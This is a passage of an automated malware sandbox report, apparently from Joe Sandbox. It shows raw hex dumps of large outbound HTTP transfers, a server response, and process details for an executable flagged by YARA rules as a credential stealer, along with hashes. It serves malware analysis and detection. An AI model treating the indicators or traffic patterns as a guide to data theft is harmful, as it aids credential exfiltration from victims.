                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: b3 75 2e e7 90 8a c0 ce c5 75 3f 3e ca ab 55 69 46 b2 3f f4 4e 99 c4 c2 00 d1 f5 ed 20 b6 cc 78 e9 ca 72 cd ed f9 3b dc 39 8f 47 17 30 20 91 5a b3 b1 da 4a 35 fd 0d 98 68 65 ae f3 a9 4f 5b b9 ca 0b 6f 35 45 3a 87 bb 34 11 ad 57 3c 4f 93 a6 12 66 d6 17 37 92 71 e3 20 7c 66 6a c1 b2 b4 cf a5 99 4e 9b e2 03 54 f6 73 1f 40 41 6d ac 41 54 01 40 3b 0d d1 45 83 c1 7c 8b 1f 38 2e 02 1c 68 1a dc a1 ad ce a1 4b 41 39 f3 34 93 9b 68 e6 ca c0 3f 01 d2 f6 13 a8 3b bc a1 17 71 9f 9c 80 ad 59 16 bd c6 90 42 51 8f 36 23 23 f4 e0 e6 c5 7b 93 94 03 d5 21 36 07 de 79 da f7 ee ad 6c 87 6a 2c 85 d0 33 4b 23 a4 be be b2 52 c7 78 b4 bd 08 6a 1d 82 15 c9 f4 13 7c b0 23 e6 e7 5c e0 2b 14 b9 96 86 fc e4 0d c6 51 4b 24 32 9e 04 dd 6c 44 4e e6 88 81 b2 c3 64 97 a3 d9 03 82 e7 5c ac
                                                                                                              Data Ascii: u.u?>UiF?N xr;9G0 ZJ5heO[o5E:4W<Of7q |fjNTs@AmAT@;E|8.hKA94h?;qYBQ6##{!6ylj,3K#Rxj|#\+QK$2lDNd\
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: f6 83 bf fa 10 a2 e1 13 02 68 e2 29 47 56 90 59 4a e0 f4 4b 32 c8 86 d5 31 9c 4d 08 4e 25 92 05 37 cf ec 03 bd 3a 63 bf 5e 3d 0b 83 6d a4 c1 85 18 c8 06 af f3 02 e4 2b e3 06 fe d2 cd d6 96 02 4d 92 14 31 30 2b 0a b5 42 a4 08 aa d9 0f e1 9c 0b 44 6b 31 ce e5 c8 34 9f 0d 9f 0b dc 44 66 c9 e1 f1 e2 bd 86 43 42 98 03 d8 e6 e3 61 aa a8 d3 9a 90 00 b3 a0 9e 18 03 da 36 07 6a 47 52 ce 92 10 e5 97 c4 85 21 22 3c 80 1d 87 7e bc 6f 54 4c c0 02 5e 48 4c f1 e1 55 f8 33 40 11 f3 ef 37 7d 40 41 ef 15 42 a2 51 f0 34 b8 04 b2 0b 38 58 e6 7f 26 bb a3 23 14 4a 15 09 7a e8 9f 73 59 40 03 18 94 e6 c5 99 c4 a2 ad 5a 84 ea 56 62 38 57 b4 d0 36 dc 44 16 55 5b 70 78 38 ef f3 c2 9c 89 14 f2 2c 61 04 0b 7e ce 35 5a 68 5c a7 25 a0 61 25 b9 c5 11 03 60 fa 68 4e 71 fe 14 3e 7b a7 83
                                                                                                              Data Ascii: h)GVYJK21MN%7:c^=m+M10+BDk14DfCBa6jGR!"<~oTL^HLU3@7}@ABQ48X&#JzsY@ZVb8W6DU[px8,a~5Zh\%a%`hNq>{
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: 7d 5a 11 6a bc 6a 3e 20 1f 27 c5 39 7e 24 49 11 85 da df 95 ad 6e 17 84 43 b9 a6 95 a9 1e 41 21 d7 33 c4 24 67 74 f6 f1 f3 bb 57 60 b7 bd 5b e5 7b f0 13 6f b7 f2 d6 0f 70 18 9b 41 ee 42 0c 1d 6d 4b bb 90 70 6a 2f f7 af 3d 8c 47 90 44 43 ba d6 d5 64 82 a4 b6 f7 b0 92 7d e8 41 ee e3 10 83 87 89 61 c8 77 53 e4 af ab 24 cd 1b cf be f0 a7 4f ff f7 da 53 36 12 cf 45 44 ad c8 4b 92 d8 fc c6 ec 3c f1 e0 fd a2 28 80 9a cd bc a8 d1 cc 8e 66 98 3e 89 d4 db 7c 5d ab 6e c5 5f e3 d5 8a 7c a3 94 c0 58 35 f4 26 08 ef 9f 0e 34 69 95 94 f9 f7 18 fc a9 3f 9e 92 f0 89 a6 82 7d ef ef b7 2e bf 6e 27 4b 93 23 ca 0f 06 c7 ac 7f d9 fe 7a e7 04 f9 0e 6f dc 1f b9 69 50 c8 cd 3d 45 b0 4c 2e 42 0a f7 2a de b8 00 07 02 6a 38 d5 9a cb cc e5 89 f4 bb a4 ef d6 e0 c2 d3 87 03 c2 47 44 1c
                                                                                                              Data Ascii: }Zjj> '9~$InCA!3$gtW`[{opABmKpj/=GDCd}AawS$OS6EDK<(f>|]n_|X5&4i?}.n'K#zoiP=EL.B*j8GD
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: 4b a0 6e fa 51 a8 39 67 f0 a3 2c 87 d7 5f 36 b0 1e e1 db 76 13 bb f2 bd 41 74 9c bd 73 70 a0 41 cc 03 af 14 de 46 ed 52 a6 fe 38 fb 63 13 e0 0d 7e da 30 2b a5 1b 3a f0 2e 94 1b 3c 9b 8d 96 2f ed 3c a7 3c e7 7c 73 78 27 7b f2 74 67 45 32 6e 75 1b 7b cd 62 a1 af 1c 5d 33 e3 5c c3 d6 28 99 a8 95 ed 1d 8d b1 11 07 ac 77 96 d5 7f 06 07 0e 0b 81 90 e9 9f 00 0c 04 fd f1 9c 65 1f 0f 13 d0 25 3d 13 60 dc 8c 64 0c 08 42 c4 84 13 9e 45 ff 68 28 99 cd f6 36 01 06 1b ff 05 8f 25 d7 31 ff 6f b9 83 36 44 de 88 ba f1 f3 e0 53 d1 8d 58 c5 de f0 94 2d 06 38 3d 94 89 b8 23 cb e6 aa 42 58 83 84 76 34 12 3b 4b 52 38 5b 8a 9a 10 8f 0c a6 97 b5 53 ef 2a ac 12 91 07 a2 be 6d 0f 09 f3 43 99 cb 48 9f 0b 60 da fd 8a fb 36 70 68 c7 da 7e a3 91 74 9c 14 b0 12 5c 73 3f 2a f5 12 e8 32
                                                                                                              Data Ascii: KnQ9g,_6vAtspAFR8c~0+:.</<<|sx'{tgE2nu{b]3\(we%=`dBEh(6%1o6DSX-8=#BXv4;KR8[S*mCH`6ph~t\s?*2
                                                                                                              2024-12-27 08:02:12 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:02:11 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=8lhp6ffhhu8svmq2heu8hjnmsi; expires=Tue, 22 Apr 2025 01:48:50 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7TlVPlEO%2FtfCuFOZpK%2B5zgxoDfY7xvqTgJaAvqg%2FefLu32jX35OpIF8IBXW6fUumANwK14fvizYLQplzjmcOmqbeOP1TvA49c778R6a%2Fvb2TFHCelYEd%2BoKNb%2BXJBgcJD9A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c96a0cb5c413-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1649&rtt_var=630&sent=207&recv=606&lost=0&retrans=0&sent_bytes=2837&recv_bytes=587395&delivery_rate=1722713&cwnd=173&unsent_bytes=0&cid=3d2c640b8cdb224f&ts=2694&x=0"



Target ID: 0
Start time: 03:01:50
Start date: 27/12/2024
Path: C:\Users\user\Desktop\onaUtwpiyq.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\onaUtwpiyq.exe"
Imagebase: 0x900000
File size: 1'869'312 bytes
MD5 hash: 7C96EEE8E62CAEDAD10358116F0B8024
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1482497732.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1482232390.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Memory Dump Source
• Source File: 00000000.00000003.1506033237.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_7e2000_onaUtwpiyq.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bdd65aa353b8263d97b7df98dc081bde2c5e9a527f0df33b5d5250d689815bbf
• Instruction ID: a479ef941ee23e644b4e61d3b3f2c973254b4aa38e46ec8bbd9a48ce11ded156
• Opcode Fuzzy Hash: bdd65aa353b8263d97b7df98dc081bde2c5e9a527f0df33b5d5250d689815bbf
• Instruction Fuzzy Hash: D791BEA280E3C48FDB138B70887A595BF70AE2761471E81DFC9C59F5A3E24D490AD763